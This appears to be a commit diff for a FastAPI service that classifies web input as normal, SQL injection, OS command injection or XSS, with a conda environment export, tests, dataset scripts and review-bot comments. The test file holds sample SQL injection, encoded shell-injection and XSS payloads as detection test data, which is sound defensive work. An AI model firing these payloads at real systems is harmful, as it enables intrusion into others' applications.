- attrs=23.1.0=py311h06a4308_0
- automat=20.2.0=py_0
- autopep8=1.6.0=pyhd3eb1b0_1
- aws-c-common=0.6.8=h5eee18b_1
- aws-c-event-stream=0.1.6=h6a678d5_6
- aws-checksums=0.1.11=h5eee18b_2
- aws-sdk-cpp=1.8.185=h721c034_1
- babel=2.11.0=py311h06a4308_0
- backports=1.1=pyhd3eb1b0_0
- backports.functools_lru_cache=1.6.4=pyhd3eb1b0_0
- backports.tempfile=1.0=pyhd3eb1b0_1
- backports.weakref=1.0.post1=py_1
- bcrypt=3.2.0=py311h5eee18b_1
- beautifulsoup4=4.12.2=py311h06a4308_0
- binaryornot=0.4.4=pyhd3eb1b0_1
- black=23.11.0=py311h06a4308_0
- blas=1.0=mkl
- bleach=4.1.0=pyhd3eb1b0_0
- blosc=1.21.3=h6a678d5_0
- bokeh=3.3.0=py311h92b7b1e_0
- boltons=23.0.0=py311h06a4308_0
- boost-cpp=1.82.0=hdb19cb5_2
- botocore=1.31.64=py311h06a4308_0
- bottleneck=1.3.5=py311hbed6279_0
- brotli=1.0.9=h5eee18b_7
- brotli-bin=1.0.9=h5eee18b_7
- brotli-python=1.0.9=py311h6a678d5_7
- brunsli=0.1=h2531618_0
- bzip2=1.0.8=h7b6447c_0
- c-ares=1.19.1=h5eee18b_0
- c-blosc2=2.10.5=h80c7b02_0
- ca-certificates=2023.12.12=h06a4308_0
- certifi=2023.11.17=py311h06a4308_0
- cffi=1.16.0=py311h5eee18b_0
- cfitsio=3.470=h5893167_7
- chardet=4.0.0=py311h06a4308_1003
- charls=2.2.0=h2531618_0
- charset-normalizer=2.0.4=pyhd3eb1b0_0
- click=8.1.7=py311h06a4308_0
- cloudpickle=2.2.1=py311h06a4308_0
- clyent=1.2.2=py311h06a4308_1
- colorama=0.4.6=py311h06a4308_0
- colorcet=3.0.1=py311h06a4308_0
- comm=0.1.2=py311h06a4308_0
- conda=23.11.0=py311h06a4308_0
- conda-build=3.28.3=py311h06a4308_0
- conda-content-trust=0.2.0=py311h06a4308_0
- conda-index=0.3.0=py311h06a4308_0
- conda-libmamba-solver=23.12.0=pyhd3eb1b0_1
- conda-pack=0.6.0=pyhd3eb1b0_0
- conda-package-handling=2.2.0=py311h06a4308_0
- conda-package-streaming=0.9.0=py311h06a4308_0
- conda-repo-cli=1.0.75=py311h06a4308_0
- conda-token=0.4.0=pyhd3eb1b0_0
- conda-verify=3.4.2=py_1
- constantly=23.10.4=py311h06a4308_0
- contourpy=1.2.0=py311hdb19cb5_0
- cookiecutter=2.5.0=py311h06a4308_0
- cryptography=41.0.7=py311hdda0065_0
- cssselect=1.1.0=pyhd3eb1b0_0
- curl=8.5.0=hdbd6064_0
- cycler=0.11.0=pyhd3eb1b0_0
- cyrus-sasl=2.1.28=h52b45da_1
- cytoolz=0.12.2=py311h5eee18b_0
- daal4py=2023.1.1=py311h4cb112f_0
- dal=2023.1.1=hdb19cb5_48680
- dask=2023.11.0=py311h06a4308_0
- dask-core=2023.11.0=py311h06a4308_0
- datasets=2.12.0=py311h06a4308_0
- datashader=0.16.0=py311h06a4308_0
- dav1d=1.2.1=h5eee18b_0
- dbus=1.13.18=hb2f20db_0
- debugpy=1.6.7=py311h6a678d5_0
- decorator=5.1.1=pyhd3eb1b0_0
- defusedxml=0.7.1=pyhd3eb1b0_0
- diff-match-patch=20200713=pyhd3eb1b0_0
- dill=0.3.6=py311h06a4308_0
- distributed=2023.11.0=py311h06a4308_0
- distro=1.8.0=py311h06a4308_0
- docstring-to-markdown=0.11=py311h06a4308_0
- docutils=0.18.1=py311h06a4308_3
- entrypoints=0.4=py311h06a4308_0
- et_xmlfile=1.1.0=py311h06a4308_0
- executing=0.8.3=pyhd3eb1b0_0
- expat=2.5.0=h6a678d5_0
- fastapi=0.103.0=py311h06a4308_0
- filelock=3.13.1=py311h06a4308_0
- flake8=6.0.0=py311h06a4308_0
- flask=2.2.5=py311h06a4308_0
- fmt=9.1.0=hdb19cb5_0
- font-ttf-dejavu-sans-mono=2.37=hd3eb1b0_0
- font-ttf-inconsolata=2.001=hcb22688_0
- font-ttf-source-code-pro=2.030=hd3eb1b0_0
- font-ttf-ubuntu=0.83=h8b1ccd4_0
- fontconfig=2.14.1=h4c34cd2_2
- fonts-anaconda=1=h8fa9717_0
- fonttools=4.25.0=pyhd3eb1b0_0
- freetype=2.12.1=h4a9f257_0
- frozenlist=1.4.0=py311h5eee18b_0
- fsspec=2023.10.0=py311h06a4308_0
- future=0.18.3=py311h06a4308_0
- gensim=4.3.0=py311hba01205_1
- gflags=2.2.2=he6710b0_0
- giflib=5.2.1=h5eee18b_3
- glib=2.69.1=he621ea3_2
- glog=0.5.0=h2531618_0
- gmp=6.2.1=h295c915_3
- gmpy2=2.1.2=py311hc9b5ff0_0
- greenlet=3.0.1=py311h6a678d5_0
- grpc-cpp=1.48.2=he1ff14a_1
- gst-plugins-base=1.14.1=h6a678d5_1
- gstreamer=1.14.1=h5eee18b_1
- h11=0.12.0=pyhd3eb1b0_0
- h2=4.0.0=py311h06a4308_3
- h5py=3.9.0=py311hdd6beaf_0
- hdf5=1.12.1=h2b7332f_3
- heapdict=1.0.1=pyhd3eb1b0_0
- holoviews=1.18.1=py311h06a4308_0
- hpack=4.0.0=py_0
- httpcore=0.15.0=py311h06a4308_0
- httpx=0.23.0=py311h06a4308_0
- huggingface_hub=0.17.3=py311h06a4308_0
- hvplot=0.9.1=py311h06a4308_0
- hyperframe=6.0.1=pyhd3eb1b0_0
- hyperlink=21.0.0=pyhd3eb1b0_0
- icu=73.1=h6a678d5_0
- idna=3.4=py311h06a4308_0
- imagecodecs=2023.1.23=py311h8105a5c_0
- imageio=2.31.4=py311h06a4308_0
- imagesize=1.4.1=py311h06a4308_0
- imbalanced-learn=0.11.0=py311h06a4308_1
- importlib-metadata=7.0.1=py311h06a4308_0
- importlib_metadata=7.0.1=hd3eb1b0_0
- incremental=21.3.0=pyhd3eb1b0_0
- inflection=0.5.1=py311h06a4308_0
- iniconfig=1.1.1=pyhd3eb1b0_0
- intake=0.6.8=py311h06a4308_0
- intel-openmp=2023.1.0=hdb19cb5_46306
- intervaltree=3.1.0=pyhd3eb1b0_0
- ipykernel=6.25.0=py311h92b7b1e_0
- ipython=8.20.0=py311h06a4308_0
- ipython_genutils=0.2.0=pyhd3eb1b0_1
- ipywidgets=8.0.4=py311h06a4308_0
- isort=5.9.3=pyhd3eb1b0_0
- itemadapter=0.3.0=pyhd3eb1b0_0
- itemloaders=1.0.4=pyhd3eb1b0_1
- itsdangerous=2.0.1=pyhd3eb1b0_0
- jaraco.classes=3.2.1=pyhd3eb1b0_0
- jedi=0.18.1=py311h06a4308_1
- jeepney=0.7.1=pyhd3eb1b0_0
- jellyfish=1.0.1=py311hb02cf49_0
- jinja2=3.1.2=py311h06a4308_0
- jmespath=1.0.1=py311h06a4308_0
- joblib=1.2.0=py311h06a4308_0
- jpeg=9e=h5eee18b_1
- jq=1.6=h27cfd23_1000
- json5=0.9.6=pyhd3eb1b0_0
- jsonpatch=1.32=pyhd3eb1b0_0
- jsonpointer=2.1=pyhd3eb1b0_0
- jsonschema=4.19.2=py311h06a4308_0
- jsonschema-specifications=2023.7.1=py311h06a4308_0
- jupyter=1.0.0=py311h06a4308_8
- jupyter-lsp=2.2.0=py311h06a4308_0
- jupyter_client=8.6.0=py311h06a4308_0
- jupyter_console=6.6.3=py311h06a4308_0
- jupyter_core=5.5.0=py311h06a4308_0
- jupyter_events=0.8.0=py311h06a4308_0
- jupyter_server=2.10.0=py311h06a4308_0
- jupyter_server_terminals=0.4.4=py311h06a4308_1
- jupyterlab=4.0.8=py311h06a4308_0
- jupyterlab_pygments=0.1.2=py_0
- jupyterlab_server=2.25.1=py311h06a4308_0
- jupyterlab_widgets=3.0.9=py311h06a4308_0
- jxrlib=1.1=h7b6447c_2
- kaleido-core=0.2.1=h7c8854e_0
- keyring=23.13.1=py311h06a4308_0
- kiwisolver=1.4.4=py311h6a678d5_0
- krb5=1.20.1=h143b758_1
- lazy-object-proxy=1.6.0=py311h5eee18b_0
- lazy_loader=0.3=py311h06a4308_0
- lcms2=2.12=h3be6417_0
- ld_impl_linux-64=2.38=h1181459_1
- lerc=3.0=h295c915_0
- libaec=1.0.4=he6710b0_1
- libarchive=3.6.2=h6ac8c49_2
- libavif=0.11.1=h5eee18b_0
- libboost=1.82.0=h109eef0_2
- libbrotlicommon=1.0.9=h5eee18b_7
- libbrotlidec=1.0.9=h5eee18b_7
- libbrotlienc=1.0.9=h5eee18b_7
- libclang=14.0.6=default_hc6dbbc7_1
- libclang13=14.0.6=default_he11475f_1
- libcups=2.4.2=h2d74bed_1
- libcurl=8.5.0=h251f7ec_0
- libdeflate=1.17=h5eee18b_1
- libedit=3.1.20230828=h5eee18b_0
- libev=4.33=h7f8727e_1
- libevent=2.1.12=hdbd6064_1
- libffi=3.4.4=h6a678d5_0
- libgcc-ng=11.2.0=h1234567_1
- libgfortran-ng=11.2.0=h00389a5_1
- libgfortran5=11.2.0=h1234567_1
- libgomp=11.2.0=h1234567_1
- liblief=0.12.3=h6a678d5_0
- libllvm14=14.0.6=hdb19cb5_3
- libmamba=1.5.6=haf1ee3a_0
- libmambapy=1.5.6=py311h2dafd23_0
- libnghttp2=1.57.0=h2d74bed_0
- libpng=1.6.39=h5eee18b_0
- libpq=12.15=hdbd6064_1
- libprotobuf=3.20.3=he621ea3_0
- libsodium=1.0.18=h7b6447c_0
- libsolv=0.7.24=he621ea3_0
- libspatialindex=1.9.3=h2531618_0
- libssh2=1.10.0=hdbd6064_2
- libstdcxx-ng=11.2.0=h1234567_1
- libthrift=0.15.0=h1795dd8_2
- libtiff=4.5.1=h6a678d5_0
- libuuid=1.41.5=h5eee18b_0
- libwebp=1.3.2=h11a3e52_0
- libwebp-base=1.3.2=h5eee18b_0
- libxcb=1.15=h7f8727e_0
- libxkbcommon=1.0.1=h5eee18b_1
- libxml2=2.10.4=hf1b16e4_1
- libxslt=1.1.37=h5eee18b_1
- libzopfli=1.0.3=he6710b0_0
- linkify-it-py=2.0.0=py311h06a4308_0
- llvmlite=0.41.0=py311he621ea3_0
- locket=1.0.0=py311h06a4308_0
- lxml=4.9.3=py311hdbbb534_0
- lz4=4.3.2=py311h5eee18b_0
- lz4-c=1.9.4=h6a678d5_0
- lzo=2.10=h7b6447c_2
- markdown=3.4.1=py311h06a4308_0
- markdown-it-py=2.2.0=py311h06a4308_1
- markupsafe=2.1.3=py311h5eee18b_0
- mathjax=2.7.5=h06a4308_0
- matplotlib=3.8.0=py311h06a4308_0
- matplotlib-base=3.8.0=py311ha02d727_0
- matplotlib-inline=0.1.6=py311h06a4308_0
- mccabe=0.7.0=pyhd3eb1b0_0
- mdit-py-plugins=0.3.0=py311h06a4308_0
- mdurl=0.1.0=py311h06a4308_0
- menuinst=2.0.1=py311h06a4308_1
- mistune=2.0.4=py311h06a4308_0
- mkl=2023.1.0=h213fc3f_46344
- mkl-service=2.4.0=py311h5eee18b_1
- mkl_fft=1.3.8=py311h5eee18b_0
- mkl_random=1.2.4=py311hdb19cb5_0
- more-itertools=10.1.0=py311h06a4308_0
- mpc=1.1.0=h10f8cd9_1
- mpfr=4.0.2=hb69a4c5_1
- mpi=1.0=mpich
- mpich=4.1.1=hbae89fd_0
- mpmath=1.3.0=py311h06a4308_0
- msgpack-python=1.0.3=py311hdb19cb5_0
- multidict=6.0.4=py311h5eee18b_0
- multipledispatch=0.6.0=py311h06a4308_0
- multiprocess=0.70.14=py311h06a4308_0
- munkres=1.1.4=py_0
- mypy_extensions=1.0.0=py311h06a4308_0
- mysql=5.7.24=h721c034_2
- navigator-updater=0.4.0=py311h06a4308_1
- nbclient=0.8.0=py311h06a4308_0
- nbconvert=7.10.0=py311h06a4308_0
- nbformat=5.9.2=py311h06a4308_0
- ncurses=6.4=h6a678d5_0
- nest-asyncio=1.5.6=py311h06a4308_0
- networkx=3.1=py311h06a4308_0
- nltk=3.8.1=py311h06a4308_0
- notebook=7.0.6=py311h06a4308_0
- notebook-shim=0.2.3=py311h06a4308_0
- nspr=4.35=h6a678d5_0
- nss=3.89.1=h6a678d5_0
- numba=0.58.1=py311ha02d727_0
- numexpr=2.8.7=py311h65dcdc2_0
- numpy=1.26.3=py311h08b1b3b_0
- numpy-base=1.26.3=py311hf175353_0
- numpydoc=1.5.0=py311h06a4308_0
- oniguruma=6.9.7.1=h27cfd23_0
- openjpeg=2.4.0=h3ad879b_0
- openpyxl=3.0.10=py311h5eee18b_0
- openssl=3.0.12=h7f8727e_0
- orc=1.7.4=hb3bc3d3_1
- overrides=7.4.0=py311h06a4308_0
- packaging=23.1=py311h06a4308_0
- pandas=2.1.4=py311ha02d727_0
- pandocfilters=1.5.0=pyhd3eb1b0_0
- panel=1.3.1=py311h06a4308_0
- param=2.0.1=py311h06a4308_0
- parsel=1.6.0=py311h06a4308_0
- parso=0.8.3=pyhd3eb1b0_0
- partd=1.4.1=py311h06a4308_0
- patch=2.7.6=h7b6447c_1001
- patchelf=0.17.2=h6a678d5_0
- pathlib=1.0.1=pyhd3eb1b0_1
- pathspec=0.10.3=py311h06a4308_0
- patsy=0.5.3=py311h06a4308_0
- pcre=8.45=h295c915_0
- pcre2=10.42=hebb0a14_0
- pep8=1.7.1=py311h06a4308_1
- pexpect=4.8.0=pyhd3eb1b0_3
- pickleshare=0.7.5=pyhd3eb1b0_1003
- pillow=10.0.1=py311ha6cbd5a_0
- pip=23.2.1=py311h06a4308_0
- pkce=1.0.3=py311h06a4308_0
- pkginfo=1.9.6=py311h06a4308_0
- platformdirs=3.10.0=py311h06a4308_0
- plotly=5.9.0=py311h06a4308_0
- pluggy=1.0.0=py311h06a4308_1
- ply=3.11=py311h06a4308_0
- prometheus_client=0.14.1=py311h06a4308_0
- prompt-toolkit=3.0.43=py311h06a4308_0
- prompt_toolkit=3.0.43=hd3eb1b0_0
- protego=0.1.16=py_0
- psutil=5.9.0=py311h5eee18b_0
- ptyprocess=0.7.0=pyhd3eb1b0_2
- pure_eval=0.2.2=pyhd3eb1b0_0
- py-cpuinfo=9.0.0=py311h06a4308_0
- py-lief=0.12.3=py311h6a678d5_0
- pyarrow=11.0.0=py311hd8e8d9b_1
- pyasn1=0.4.8=pyhd3eb1b0_0
- pyasn1-modules=0.2.8=py_0
- pybind11-abi=4=hd3eb1b0_1
- pycodestyle=2.10.0=py311h06a4308_0
- pycosat=0.6.6=py311h5eee18b_0
- pycparser=2.21=pyhd3eb1b0_0
- pyct=0.5.0=py311h06a4308_0
- pycurl=7.45.2=py311hdbd6064_1
- pydantic=1.10.12=py311h5eee18b_1
- pydispatcher=2.0.5=py311h06a4308_2
- pydocstyle=6.3.0=py311h06a4308_0
- pyerfa=2.0.0=py311h5eee18b_0
- pyflakes=3.0.1=py311h06a4308_0
- pygments=2.15.1=py311h06a4308_1
- pyjwt=2.4.0=py311h06a4308_0
- pylint=2.16.2=py311h06a4308_0
- pylint-venv=2.3.0=py311h06a4308_0
- pyls-spyder=0.4.0=pyhd3eb1b0_0
- pyodbc=4.0.39=py311h6a678d5_0
- pyopenssl=23.2.0=py311h06a4308_0
- pyparsing=3.0.9=py311h06a4308_0
- pyqt=5.15.10=py311h6a678d5_0
- pyqt5-sip=12.13.0=py311h5eee18b_0
- pyqtwebengine=5.15.10=py311h6a678d5_0
- pysocks=1.7.1=py311h06a4308_0
- pytables=3.8.0=py311hb8ae3fc_3
- pytest=7.4.0=py311h06a4308_0
- python=3.11.5=h955ad1f_0
- python-dateutil=2.8.2=pyhd3eb1b0_0
- python-dotenv=0.21.0=py311h06a4308_0
- python-fastjsonschema=2.16.2=py311h06a4308_0
- python-json-logger=2.0.7=py311h06a4308_0
- python-kaleido=0.2.1=py311h06a4308_0
- python-libarchive-c=2.9=pyhd3eb1b0_1
- python-lmdb=1.4.1=py311h6a678d5_0
- python-lsp-black=1.2.1=py311h06a4308_0
- python-lsp-jsonrpc=1.0.0=pyhd3eb1b0_0
- python-lsp-server=1.7.2=py311h06a4308_0
- python-slugify=5.0.2=pyhd3eb1b0_0
- python-snappy=0.6.1=py311h6a678d5_0
- python-tzdata=2023.3=pyhd3eb1b0_0
- python-xxhash=2.0.2=py311h5eee18b_1
- pytoolconfig=1.2.6=py311h06a4308_0
- pytz=2023.3.post1=py311h06a4308_0
- pyviz_comms=3.0.0=py311h06a4308_0
- pywavelets=1.5.0=py311hf4808d0_0
- pyxdg=0.27=pyhd3eb1b0_0
- pyyaml=6.0.1=py311h5eee18b_0
- pyzmq=25.1.0=py311h6a678d5_0
- qdarkstyle=3.0.2=pyhd3eb1b0_0
- qstylizer=0.2.2=py311h06a4308_0
- qt-main=5.15.2=h53bd1ea_10
- qt-webengine=5.15.9=h9ab4d14_7
- qtawesome=1.2.2=py311h06a4308_0
- qtconsole=5.4.2=py311h06a4308_0
- qtpy=2.4.1=py311h06a4308_0
- queuelib=1.6.2=py311h06a4308_0
- re2=2022.04.01=h295c915_0
- readline=8.2=h5eee18b_0
- referencing=0.30.2=py311h06a4308_0
- regex=2023.10.3=py311h5eee18b_0
- reproc=14.2.4=h295c915_1
- reproc-cpp=14.2.4=h295c915_1
- requests=2.31.0=py311h06a4308_0
- requests-file=1.5.1=pyhd3eb1b0_0
- requests-toolbelt=1.0.0=py311h06a4308_0
- responses=0.13.3=pyhd3eb1b0_0
- rfc3339-validator=0.1.4=py311h06a4308_0
- rfc3986=1.4.0=pyhd3eb1b0_0
- rfc3986-validator=0.1.1=py311h06a4308_0
- rich=13.3.5=py311h06a4308_0
- rope=1.7.0=py311h06a4308_0
- rpds-py=0.10.6=py311hb02cf49_0
- rtree=1.0.1=py311h06a4308_0
- ruamel.yaml=0.17.21=py311h5eee18b_0
- ruamel_yaml=0.17.21=py311h5eee18b_0
- s3fs=2023.10.0=py311h06a4308_0
- safetensors=0.4.0=py311h24d97f6_0
- scikit-image=0.20.0=py311h6a678d5_0
- scikit-learn=1.2.2=py311h6a678d5_1
- scikit-learn-intelex=2023.1.1=py311h06a4308_0
- scipy=1.11.4=py311h08b1b3b_0
- scrapy=2.8.0=py311h06a4308_0
- seaborn=0.12.2=py311h06a4308_0
- secretstorage=3.3.1=py311h06a4308_1
- semver=2.13.0=pyhd3eb1b0_0
- send2trash=1.8.2=py311h06a4308_0
- service_identity=18.1.0=pyhd3eb1b0_1
- setuptools=68.0.0=py311h06a4308_0
- sip=6.7.12=py311h6a678d5_0
- six=1.16.0=pyhd3eb1b0_1
- smart_open=5.2.1=py311h06a4308_0
- snappy=1.1.10=h6a678d5_1
- sniffio=1.2.0=py311h06a4308_1
- snowballstemmer=2.2.0=pyhd3eb1b0_0
- sortedcontainers=2.4.0=pyhd3eb1b0_0
- soupsieve=2.5=py311h06a4308_0
- sphinx=5.0.2=py311h06a4308_0
- sphinxcontrib-applehelp=1.0.2=pyhd3eb1b0_0
- sphinxcontrib-devhelp=1.0.2=pyhd3eb1b0_0
- sphinxcontrib-htmlhelp=2.0.0=pyhd3eb1b0_0
- sphinxcontrib-jsmath=1.0.1=pyhd3eb1b0_0
- sphinxcontrib-qthelp=1.0.3=pyhd3eb1b0_0
- sphinxcontrib-serializinghtml=1.1.5=pyhd3eb1b0_0
- spyder=5.4.3=py311h06a4308_1
- spyder-kernels=2.4.4=py311h06a4308_0
- sqlalchemy=2.0.25=py311h5eee18b_0
- sqlite=3.41.2=h5eee18b_0
- stack_data=0.2.0=pyhd3eb1b0_0
- starlette=0.27.0=py311h06a4308_0
- statsmodels=0.14.0=py311hf4808d0_0
- sympy=1.12=py311h06a4308_0
- tabulate=0.9.0=py311h06a4308_0
- tbb=2021.8.0=hdb19cb5_0
- tbb4py=2021.8.0=py311hdb19cb5_0
- tblib=1.7.0=pyhd3eb1b0_0
- tenacity=8.2.2=py311h06a4308_0
- terminado=0.17.1=py311h06a4308_0
- text-unidecode=1.3=pyhd3eb1b0_0
- textdistance=4.2.1=pyhd3eb1b0_0
- threadpoolctl=2.2.0=pyh0d69192_0
- three-merge=0.1.1=pyhd3eb1b0_0
- tifffile=2023.4.12=py311h06a4308_0
- tinycss2=1.2.1=py311h06a4308_0
- tk=8.6.12=h1ccaba5_0
- tldextract=3.2.0=pyhd3eb1b0_0
- tokenizers=0.13.3=py311h22610ee_0
- toml=0.10.2=pyhd3eb1b0_0
- tomlkit=0.11.1=py311h06a4308_0
- toolz=0.12.0=py311h06a4308_0
- tornado=6.3.3=py311h5eee18b_0
- tqdm=4.65.0=py311h92b7b1e_0
- traitlets=5.7.1=py311h06a4308_0
- transformers=4.32.1=py311h06a4308_0
- truststore=0.8.0=py311h06a4308_0
- twisted=22.10.0=py311h5eee18b_0
- typing-extensions=4.9.0=pyhd3eb1b0_0
- typing_extensions=4.9.0=py311h06a4308_0
- tzdata=2023d=h04d1e81_0
- uc-micro-py=1.0.1=py311h06a4308_0
- ujson=5.4.0=py311h6a678d5_0
- unidecode=1.2.0=pyhd3eb1b0_0
- unixodbc=2.3.11=h5eee18b_0
- urllib3=1.26.18=py311h06a4308_0
- utf8proc=2.6.1=h27cfd23_0
- uvicorn=0.20.0=py311h06a4308_0
- w3lib=1.21.0=pyhd3eb1b0_0
- watchdog=2.1.6=py311h06a4308_0
- wcwidth=0.2.5=pyhd3eb1b0_0
- webencodings=0.5.1=py311h06a4308_1
- websocket-client=0.58.0=py311h06a4308_4
- werkzeug=2.2.3=py311h06a4308_0
- whatthepatch=1.0.2=py311h06a4308_0
- wheel=0.38.4=py311h06a4308_0
- widgetsnbextension=4.0.5=py311h06a4308_0
- wrapt=1.14.1=py311h5eee18b_0
- wurlitzer=3.0.2=py311h06a4308_0
- xarray=2023.6.0=py311h06a4308_0
- xxhash=0.8.0=h7f8727e_3
- xyzservices=2022.9.0=py311h06a4308_1
- xz=5.4.5=h5eee18b_0
- yaml=0.2.5=h7b6447c_0
- yaml-cpp=0.8.0=h6a678d5_0
- yapf=0.31.0=pyhd3eb1b0_0
- yarl=1.9.3=py311h5eee18b_0
- zeromq=4.3.4=h2531618_0
- zfp=1.0.0=h6a678d5_0
- zict=3.0.0=py311h06a4308_0
- zipp=3.17.0=py311h06a4308_0
- zlib=1.2.13=h5eee18b_0
- zlib-ng=2.0.7=h5eee18b_0
- zope=1.0=py311h06a4308_1
- zope.interface=5.4.0=py311h5eee18b_0
- zstandard=0.19.0=py311h5eee18b_0
- zstd=1.5.5=hc292b87_0
- pip:
- dumper==1.2.0
- faker==22.0.0
prefix: /home/bro/anaconda3
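Review bot: the `prefix: /home/bro/anaconda3` line at the end of this file hard-codes one developer's home directory and should be dropped from the committed environment. The list is also a full export of an Anaconda install with build strings (for example `spyder`, `scrapy`, `sphinx`), none of which the Python files in this commit import; a short file naming only the direct dependencies would be easier to audit and patch. Keep the `scikit-learn=1.2.2` pin, since the committed `.joblib` models are pickles tied to the scikit-learn version that wrote them.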

28
main.py Normal file

@ -0,0 +1,28 @@
import joblib
from typing import Union
from fastapi import FastAPI
from pydantic import BaseModel
class Item(BaseModel):
value: str
app = FastAPI()
@app.get("/")
async def read_main():
return {"msg": "Welcome in simple web application that provides prediction whether the sent data is an attack attempt or not. Use /detect/ endpoints with GET or POST methods - POST endpoint awaits for simple json with value assigned to 'value' key :) "}
@app.get("/detect/{value}")
async def detect_input_get(value: Union[str]):
nb_saved = joblib.load("nb.joblib")
vec_saved = joblib.load("vec.joblib")
return {"prediction": str(nb_saved.predict(vec_saved.transform([value])))}
@app.post("/detect/")
async def detect_input_post(item: Item):
nb_saved = joblib.load("nb.joblib")
vec_saved = joblib.load("vec.joblib")
return {"prediction": str(nb_saved.predict(vec_saved.transform([item.value])))}
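Review bot: both `/detect` handlers call `joblib.load("nb.joblib")` and `joblib.load("vec.joblib")` on every request, which repeats a pickle deserialization per call and resolves the files relative to whatever the process working directory happens to be. Load the model and vectorizer once at startup from a path derived from `__file__`, and since `joblib.load` runs pickle, verify a known checksum of the two artifacts before loading them. In the GET route, `Union[str]` is just `str`, and the `{value}` path parameter cannot match input containing `/`, so such payloads return 404 instead of a prediction; POST should be the documented way to submit data.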

BIN
nb.joblib Normal file

Binary file not shown.

69
test_main.py Normal file

@ -0,0 +1,69 @@
from fastapi.testclient import TestClient
from main import app
client = TestClient(app)
def test_detect_input_get_normal():
response = client.get("/detect/normaldata")
assert response.status_code == 200
assert response.json() == {"prediction": "['normal']"}
def test_detect_input_post_normal():
response = client.post(
"/detect/",
json={"value": "normaldata"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['normal']"
}
def test_detect_input_get_sqli():
response = client.get("/detect/admin') or '1'='1'--")
assert response.status_code == 200
assert response.json() == {"prediction": "['sql-injection']"}
def test_detect_input_post_sqli():
response = client.post(
"/detect/",
json={"value": "admin') or '1'='1'--"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['sql-injection']"
}
def test_detect_input_get_osi():
response = client.get("/detect/%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522")
assert response.status_code == 200
assert response.json() == {"prediction": "['os-command-injection']"}
def test_detect_input_post_osi():
response = client.post(
"/detect/",
json={"value": "%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['os-command-injection']"
}
def test_detect_input_get_xss():
response = client.get("/detect/<div style=xss:expressio\6e(alert(1))>")
assert response.status_code == 200
assert response.json() == {"prediction": "['xss']"}
def test_detect_input_post_xss():
response = client.post(
"/detect/",
json={"value": "<div style=xss:expressio\6e(alert(1))>"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['xss']"
}
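Review bot: in both XSS tests the literal `"<div style=xss:expressio\6e(alert(1))>"` is a normal Python string, so `\6` is read as an octal escape and the model is sent the control character U+0006 followed by `e`, not the backslash the payload is meant to carry; use a raw string (`r"..."`) or `\\6e`. The OS command injection pair also classifies two different inputs: the GET path is percent-decoded before it reaches the handler, while the POST body is scored as the literal `%22%7C...` text. The `print(response.json())` calls in the POST tests can be removed.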

64
utils/calculate_statistics.py Executable file

@ -0,0 +1,64 @@
import pandas as pd
def countPercentOfNumbers(row):
numberOfChars = len(row['value'])
numberOfDigitsInString = sum(c.isdigit() for c in row['value'])
if (numberOfDigitsInString == 0):
return 0
else:
return (numberOfDigitsInString/numberOfChars) * 100
def countPercentOfLetters(row):
numberOfChars = len(row['value'])
numberOfAlphasInString = sum(c.isalpha() for c in row['value'])
if (numberOfAlphasInString == 0):
return 0
else:
return (numberOfAlphasInString/numberOfChars) * 100
def countPercentOfSpaces(row):
numberOfChars = len(row['value'])
numberOfSpacesInString = sum(c.isspace() for c in row['value'])
if (numberOfSpacesInString == 0):
return 0
else:
return (numberOfSpacesInString / numberOfChars) * 100
def countPercentOfSpecials(row):
numberOfChars = len(row['value'])
numberOfDigitsInString = sum(c.isdigit() for c in row['value'])
numberOfAlphasInString = sum(c.isalpha() for c in row['value'])
numberOfSpacesInString = sum(c.isspace() for c in row['value'])
numberOfSpecials = numberOfChars - numberOfDigitsInString - numberOfAlphasInString - numberOfSpacesInString
if (numberOfSpecials == 0):
return 0
else:
return (numberOfSpecials/numberOfChars) * 100
df = pd.read_csv('../datasets/out.csv',
usecols=range(2),
lineterminator='\n',
header=None)
df = df.rename(columns={0: "type", 1: "value"})
df['numberOfChars'] = df.apply(lambda row: len(row['value']), axis=1)
print('Mean amount of chars by type')
print(df.groupby(['type'])["numberOfChars"].mean())
df['percentOfLetters'] = df.apply(countPercentOfLetters, axis=1)
df['percentOfNumbers'] = df.apply(countPercentOfNumbers, axis=1)
df['percentOfSpecialChars'] = df.apply(countPercentOfSpecials, axis=1)
df['percentOfSpaces'] = df.apply(countPercentOfSpaces, axis=1)
print('Mean percent of alphanumeric by type')
print(df.groupby(['type'])["percentOfLetters"].mean())
print('Mean percent of digits by type')
print(df.groupby(['type'])["percentOfNumbers"].mean())
print('Mean percent of special characters by type')
print(df.groupby(['type'])["percentOfSpecialChars"].mean())
print('Mean percent of spaces by type')
print(df.groupby(['type'])["percentOfSpaces"].mean())
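Review bot: the heading `'Mean percent of alphanumeric by type'` prints `percentOfLetters`, which is computed with `isalpha()` only, so the label should say letters. Every value in `out.csv` is written wrapped in `'...'` by `csv_generator.py`, and those two quote characters are counted in `numberOfChars` and as special characters here, which skews the per-class means for short values. `len(row['value'])` will raise if `read_csv` yields a missing value for a row, so drop or fill NaN before the `apply` calls, and the four `countPercentOf*` functions could be one helper that takes the character predicate.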

37
utils/csv_generator.py Normal file

@ -0,0 +1,37 @@
#!/usr/bin/python
fileOut = open('../datasets/out.csv', 'w')
file = open('../datasets/regular_web_form_data.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("normal,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
file = open('../datasets/os-command-injection.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("os-command-injection,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
file = open('../datasets/sql-injection.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("sql-injection,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
file = open('../datasets/xss.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("xss,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
fileOut.close()
